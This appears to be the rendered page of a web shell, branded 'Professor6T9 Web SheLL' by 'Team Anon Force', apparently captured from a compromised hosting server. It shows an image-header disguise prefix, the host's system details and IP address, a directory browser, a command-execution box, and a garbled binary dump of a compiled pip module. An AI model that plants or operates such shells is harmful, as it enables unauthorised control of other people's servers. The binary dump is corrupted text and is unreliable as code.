GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
pip
/
_internal
/
commands
/
__pycache__
[ HOME ]
Exec
Submit
show.cpython-312.pyc
� �0i� � � � d dl mZ d dlZd dlZd dlmZmZmZ d dlm Z d dl mZ d dlm Z d dlmZ d dlmZ d d lmZmZ d d lmZmZ d dlmZ ej4 e� Zdd�Z G d � de� Z G d� de� Zdd�Z dd�Z!y)� )�annotationsN)� Generator�Iterable�Iterator)�Values)� NamedTuple)�InvalidRequirement)�canonicalize_name)�Command)�ERROR�SUCCESS)�BaseDistribution�get_default_environment)�write_outputc � � t j t j z }t j dd|� }| j |� j � S )N� )�string�punctuation� whitespace�str� maketrans� translate�lower)�label�chars_to_remove�removal_maps �J/opt/hc_python/lib/python3.12/site-packages/pip/_internal/commands/show.py�normalize_project_url_labelr sB � ��(�(�6�+<�+<�<�O��-�-��B��8�K��?�?�;�'�-�-�/�/� c �( � e Zd ZdZdZdZdd�Zdd�Zy) �ShowCommandzx Show information about one or more installed packages. The output is in RFC-compliant mail header format. z$ %prog [options] <package> ...Tc � � | j j dddddd�� | j j d| j � y ) Nz-fz--files�files� store_trueFz7Show the full list of installed files for each package.)�dest�action�default�helpr )�cmd_opts� add_option�parser�insert_option_group)�selfs r �add_optionszShowCommand.add_options&